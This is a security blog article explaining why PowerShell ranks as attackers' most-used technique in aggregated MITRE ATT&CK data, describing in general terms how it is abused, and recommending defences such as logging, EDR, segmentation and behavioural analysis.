How do cyber pros prioritize their security efforts? A good place to start is knowing exactly what tactics, techniques and procedures (TTP) threat actors use. In a recently published report, aggregated data was used to identify the most common attack techniques as defined by the MITRE ATT&CK framework.

The study revealed that PowerShell Command & Scripting Interpreter was the number one attack technique used by threat actors. PowerShell is a command-line shell and scripting language that is widely used by system administrators and security professionals to automate tasks and manage systems. But threat actors can also use PowerShell to carry out malicious activities on compromised systems.

Top Attack Techniques

The report provides a strong representation of adversary activity from authoritative sources. It assembled data from M-Trends, Red Canary’s Threat Detection Report, CTID ATT&CK Sightings Ecosystem and CISA alerts ranging from 2020 to 2022.

At the top of the list of techniques was PowerShell. As per the report, adversaries that breach a system are likely to start up the PowerShell command line utility 28.49% of the time. Using this technique, actors can move laterally throughout a network and gain persistence on the compromised machine. Obfuscating files and exploiting public-facing applications were second and third on the list of top techniques used by attackers.

Palo Alto Networks Unit 42 recently reported that the ransomware gang Vice Society is deploying a new, sophisticated PowerShell script attack to automate data theft. Vice Society’s data exfiltrator uses “living off the land” binaries and scripts unlikely to trigger security alerts. This makes it easier for the actors to encrypt data and then demand a ransom.

How Do Attackers Use PowerShell?

PowerShell is both a command-line shell and a scripting language that can execute commands and scripts on a target system. Therefore, a PowerShell cyberattack is a type of command and scripting interpreter attack. In this type of attack, the hacker leverages a legitimate tool built into Windows.

A PowerShell cyberattack typically involves malicious actions such as:

  • Command and Control (C2) Communication: Attackers use PowerShell commands to communicate with their C2 servers, download/execute malware and exfiltrate sensitive data.
  • Credential Theft: PowerShell can be used to extract login credentials (such as passwords or tokens) from a compromised system.
  • Lateral Movement: Attackers can use PowerShell to move laterally within a compromised network, gaining access to additional systems and resources.
  • Fileless Malware: PowerShell can be used to execute fileless malware, which can be difficult to detect by traditional antivirus solutions.
  • Data Manipulation: PowerShell can be used to modify or delete files, registry keys and other system settings. This can disrupt normal system operations and cause damage to the system.

Living Off the Land

A PowerShell cyberattack is considered to be a type of Living Off the Land (LOTL) attack. LOTL attacks refer to a technique used by attackers to evade detection by using legitimate tools and functionalities already present in the target system. LOTL techniques avoid using malware that can be detected by antivirus software.

PowerShell is a legitimate tool already present on most Windows systems. It has powerful features that attackers can abuse to carry out malicious activities. In this way, attackers do not have to download any additional malware onto the compromised system.

How to Thwart PowerShell Attacks

There are several methods to detect and prevent PowerShell cyberattacks:

  1. Restrict PowerShell Usage: Organizations can restrict PowerShell usage to only authorized users and scripts signed by trusted publishers.
  2. Implement PowerShell Logging and Monitoring: PowerShell generates detailed logs that can help detect suspicious activity. Organizations can enable PowerShell logging and monitor the logs for unusual activity, such as the execution of suspicious commands or scripts.
  3. Endpoint Detection and Response (EDR): EDR solutions monitor system activity and detect suspicious PowerShell activity, such as the execution of known malicious commands or scripts.
  4. Apply Software Updates and Patches: Software updates and patches can remediate many PowerShell vulnerabilities. Companies should ensure that all systems are up-to-date with the latest security patches and updates to fix known PowerShell vulnerabilities.
  5. Implement network segmentation: Network segmentation can limit the impact of a PowerShell attack by restricting the intruder’s ability to move laterally within the network and access sensitive systems and data.
  6. Threat intelligence: Threat intelligence can provide information on known PowerShell-based attacks and indicators of compromise (IOCs). This can be used to detect and block attacks before they can cause damage.

Behavioral Analysis vs. PowerShell Attacks

Behavioral analysis and anomaly detection can also be effective in detecting PowerShell-based attacks. These techniques focus on monitoring system behavior and detecting deviations from normal behavior patterns, which can indicate the presence of an intruder using PowerShell.

Behavioral analysis involves creating a baseline of normal system behavior and monitoring the system for any deviations from this baseline. This can involve monitoring user activity, network traffic and system processes to detect unusual behavior that may be indicative of an attack.

Anomaly detection involves using machine learning algorithms to detect unusual activity on the system. These algorithms can identify patterns in system activity and alert security teams to any deviations from these patterns. This can help detect PowerShell cyberattacks that involve unusual patterns of system activity.

Should PowerShell be Disabled?

Experts advise against disabling PowerShell as it is a useful command-line interface for Windows. PowerShell can help with forensics, incident response and automating desktop tasks, according to joint advice from the National Security Agency and CISA.

The U.S. Department of Defense also advises against removing PowerShell. As per the DoD, blocking the interface hinders the defensive capabilities that current versions of PowerShell can provide. Removing it also prevents components of Windows from running properly.

While PowerShell is a useful tool, it is also the number one technique attackers use to carry out LOTL attacks. Organizations should be aware of the risks associated with PowerShell and take steps to protect their systems against these types of attacks.

More from Risk Management

Is Open-Source Security a Ticking Cyber Time Bomb?

4 min read - Software depends on layers of code, and much of that code comes from open-source libraries. According to an Octoverse 2022 report, open-source code is used in 97% of applications. Not only do developers embrace open source, but so do nine in 10 companies. “Open-source software is the foundation of 99% of the world’s software,” Martin Woodward, VP of developer relations at GitHub, told VentureBeat.As the foundation of just about every piece of software, every application or device runs on code that…

4 min read

How to Manage Cyber Risk During Mergers and Acquisitions

4 min read - By attracting attention from threat actors, merger and acquisition (M&A) events are a significant source of cyber crime risk. So much so that, according to a 2020 IBM Institute of Business Value study, more than one in three executives said they experienced data breaches that can be attributed to M&A activity during integration.Security ratings, provided by security rating services (SRS), can deliver an overview of risk to stakeholders. But attack surface management (ASM) tools give security teams actionable insight on…

4 min read

A Software Bill of Materials Helps Secure Your Supply Chain

6 min read - The software supply chain involves developing, maintaining and distributing software to end users. To enhance the functionality of the software being developed, developers frequently depend upon open-source components and libraries. These can be sourced from external vendors like Docker images or open-source projects and in-house providers. But while third-party vendors are often critical to software functionality, they can also increase risk. A compromised software supply chain could lead to the distribution of malicious software, unauthorized access to sensitive data and…

6 min read

How Application Allowlisting Combats Ransomware Attacks

5 min read - Ransomware attacks are on the rise in both volume and sophistication. Triple extortion (a ransomware attack on one business leading to extortion threats on its business partners) is raising the cost of attacks. Ransomware-as-a-Service puts the means to attack in the hands of smaller criminal entities, making the tactic a commodity and not just the tool of masterminds. It’s no surprise that ransomware attacks are now substantially more expensive to recover from than other types of data breaches. Keeping attackers…

5 min read